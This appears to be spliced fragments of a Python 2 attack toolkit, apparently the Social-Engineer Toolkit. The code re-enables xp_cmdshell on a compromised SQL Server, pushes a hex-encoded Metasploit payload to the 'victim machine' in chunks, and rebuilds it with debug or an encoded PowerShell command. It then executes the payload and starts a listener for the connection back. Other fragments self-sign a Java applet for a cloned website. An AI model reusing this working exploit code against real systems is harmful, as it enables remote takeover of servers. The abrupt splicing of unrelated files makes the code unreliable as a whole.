"cp src/html/msf.exe src/program_junk/ 1> /dev/null 2> /dev/null",
shell=True).wait()
subprocess.Popen(
"cp src/program_junk/msf2.exe src/program_junk/msf.exe 1> /dev/null 2> /dev/null",
shell=True).wait()
fileopen = file("%s/msf.exe" % (web_path), "rb")
# read in the binary
data = fileopen.read()
# convert the binary to hex
data = binascii.hexlify(data)
# we write out binary out to a file
filewrite = file("src/program_junk/payload.hex", "w")
filewrite.write(data)
filewrite.close()
# if we are using metasploit, start the listener
if not os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
meta_path = setcore.meta_path()
setcore.PrintStatus("Starting the Metasploit listener...")
child2 = pexpect.spawn(
"%s/msfconsole -r src/program_junk/meta_config" % (meta_path))
# random executable name
random_exe = setcore.generate_random_string(10, 15)
#
# next we deploy our hex to binary if we selected option 1 (powershell)
#
if option == "1":
# powershell command here, needs to be unicoded then base64 in order to use encodedcommand
powershell_command = unicode(
"$s=gc \"C:\\Windows\\system32\\%s\";$s=[string]::Join('',$s);$s=$s.Replace('`r',''); $s=$s.Replace('`n','');$b=new-object byte[] $($s.Length/2);0..$($b.Length-1)|%%{$b[$_]=[Convert]::ToByte($s.Substring($($_*2),2),16)};[IO.File]::WriteAllBytes(\"C:\\Windows\\system32\\%s.exe\",$b)"
% (random_exe, random_exe))
########################################################################################################################################################################################################
#
# there is an odd bug with python unicode, traditional unicode inserts a null byte after each character typically.. python does not so the encodedcommand becomes corrupt
# in order to get around this a null byte is pushed to each string value to fix this and make the encodedcommand work properly
#
########################################################################################################################################################################################################
# blank command will store our fixed unicode variable
blank_command = ""
# loop through each character and insert null byte
for char in powershell_command:
# insert the nullbyte
blank_command += char + "\x00"
# assign powershell command as the new one
powershell_command = blank_command
# base64 encode the powershell command
powershell_command = base64.b64encode(powershell_command)
# this will trigger when we are ready to convert
#
# next we deploy our hex to binary if we selected option 2 (debug)
#
if option == "2":
setcore.PrintStatus(
"Attempting to re-enable the xp_cmdshell stored procedure if disabled.."
)
# reconfigure the stored procedure and re-enable
try:
target_server.execute_query(
"EXEC sp_configure 'show advanced options', 1; RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;"
)
# need to do it a second time for some reason on 2005
target_server.execute_query("RECONFIGURE;")
except:
pass
# we selected hex to binary
fileopen = file("src/payloads/hex2binary.payload", "r")
# specify random filename for deployment
setcore.PrintStatus("Deploying initial debug stager to the system.")
random_file = setcore.generate_random_string(10, 15)
for line in fileopen:
# remove bogus chars
line = line.rstrip()
# make it printer friendly to screen
print_line = line.replace("echo e", "")
setcore.PrintStatus("Deploying stager payload (hex): " +
setcore.bcolors.BOLD + str(print_line) +
setcore.bcolors.ENDC)
target_server.execute_query("xp_cmdshell '%s>> %s'" %
(line, random_file))
setcore.PrintStatus("Converting the stager to a binary...")
# here we convert it to a binary
target_server.execute_query("xp_cmdshell 'debug<%s'" % (random_file))
setcore.PrintStatus("Conversion complete. Cleaning up...")
# delete the random file
target_server.execute_query("xp_cmdshell 'del %s'" % (random_file))
# here we start the conversion and execute the payload
setcore.PrintStatus(
"Sending the main payload via to be converted back to a binary.")
# read in the file 900 bytes at a time
fileopen = file("src/program_junk/payload.hex", "r")
#random_exe = setcore.generate_random_string(10,15)
while fileopen:
data = fileopen.read(900).rstrip()
# if data is done then break out of loop because file is over
if data == "": break
setcore.PrintStatus("Deploying payload to victim machine (hex): " +
setcore.bcolors.BOLD + str(data) +
setcore.bcolors.ENDC + "\n")
target_server.execute_query("xp_cmdshell 'echo %s>> %s'" %
(data, random_exe))
setcore.PrintStatus(
"Delivery complete. Converting hex back to binary format.")
# if we are using debug conversion then convert our binary
if option == "2":
target_server.execute_query("xp_cmdshell 'rename MOO.bin %s.exe'" %
(random_file))
target_server.execute_query("xp_cmdshell '%s %s'" %
(random_file, random_exe))
# clean up the old files
setcore.PrintStatus("Cleaning up old files..")
target_server.execute_query("xp_cmdshell 'del %s'" % (random_exe))
# if we are using SET payload
if os.path.isfile("%s/src/program_junk/set.payload" % (definepath)):
setcore.PrintStatus("Spawning seperate child process for listener...")
subprocess.Popen(
"cp src/program_junk/web_clone/x ./ 1> /dev/null 2>/dev/null",
shell=True).wait()
# start a threaded webserver in the background
child1 = pexpect.spawn("python src/html/fasttrack_http_server.py")
# grab the port options
if os.path.isfile("%s/src/program_junk/port.options" % (definepath)):
fileopen = file("%s/src/program_junk/port.options" % (definepath),
"r")
port = fileopen.read().rstrip()
# if for some reason the port didnt get created we default to 443
if not os.path.isfile("%s/src/program_junk/port.options" %
(definepath)):
port = "443" # default 443
# launch the python listener through pexpect
# need to change the directory real quick
os.chdir(definepath)
child2 = pexpect.spawn(
"python src/payloads/set_payloads/listener.py %s" % (port))
# now back
os.chdir("src/program_junk/web_clone/")
setcore.PrintStatus("Triggering payload stager...")
# thread is needed here due to the connect not always terminating thread, it hangs if thread isnt specified
import thread
# execute the payload
# we append more commands if option 1 is used
if option == "1":
random_exe_execute = random_exe
random_exe = "powershell -EncodedCommand " + powershell_command
sql_command = ("xp_cmdshell '%s'" % (random_exe))
# start thread of SQL command that executes payload
thread.start_new_thread(target_server.execute_query, (sql_command, ))
time.sleep(5)
# trigger the exe if option 1 is used
if option == "1":
sql_command = ("xp_cmdshell '%s'" % (random_exe_execute))
thread.start_new_thread(target_server.execute_query, (sql_command, ))
# if pexpect doesnt exit right then it freaks out
try:
# interact with the child process through pexpect
child2.interact()
subprocess.Popen("rm x 1> /dev/null 2> /dev/null", shell=True).wait()
except:
pass
core.return_continue()
# Py2/3 compatibility
# Python3 renamed raw_input to input
try:
input = raw_input
except NameError:
pass
# see if we are tracking emails
track_email = core.check_config("TRACK_EMAIL_ADDRESSES=").lower()
# grab the randomized applet name
applet_name = core.check_options("APPLET_NAME=")
if applet_name == "":
applet_name = core.generate_random_string(6, 15) + ".jar"
core.update_options("APPLET_NAME=" + applet_name)
# define if we are using a custom payload
custom = 0
if core.check_options("CUSTOM_EXE="):
custom = 1
core.print_status(
"Note that since you are using a custom payload, you will need to create your OWN listener."
)
core.print_status(
"SET has no idea what type of payload you are using, so you will need to set this up manually."
)
core.print_status(
"If using a custom Metasploit payload, setup a multi/handler, etc. to capture the connection back."
)
Name: FakeCompany
Organization: Fake Company
Organization Name: Fake Company
City: Cleveland
State: Ohio
Country: US
Is this correct: yes
"""
setcore.print_error("*** WARNING ***")
setcore.print_error("IN ORDER FOR THIS TO WORK YOU MUST INSTALL sun-java6-jdk or openjdk-6-jdk, so apt-get install openjdk-6-jdk")
setcore.print_error("*** WARNING ***")
# random string used to generate signature of java applet
random_string = setcore.generate_random_string(10, 30)
# grab keystore to use later
subprocess.Popen("keytool -genkey -alias %s -keystore mykeystore -keypass mykeypass -storepass mystorepass" % (random_string), shell=True).wait()
# self-sign the applet
subprocess.Popen("jarsigner -keystore mykeystore -storepass mystorepass -keypass mykeypass -signedjar Signed_Update.jar unsigned.jar %s" % (random_string), shell=True).wait()
# move it into our html directory
subprocess.Popen("cp Signed_Update.jar ../", shell=True).wait()
subprocess.Popen("mv Signed_Update.jar ../../program_junk/", shell=True)
# move back to original directory
os.chdir("../../../")
setcore.print_status("Java Applet is now signed and will be imported into the website")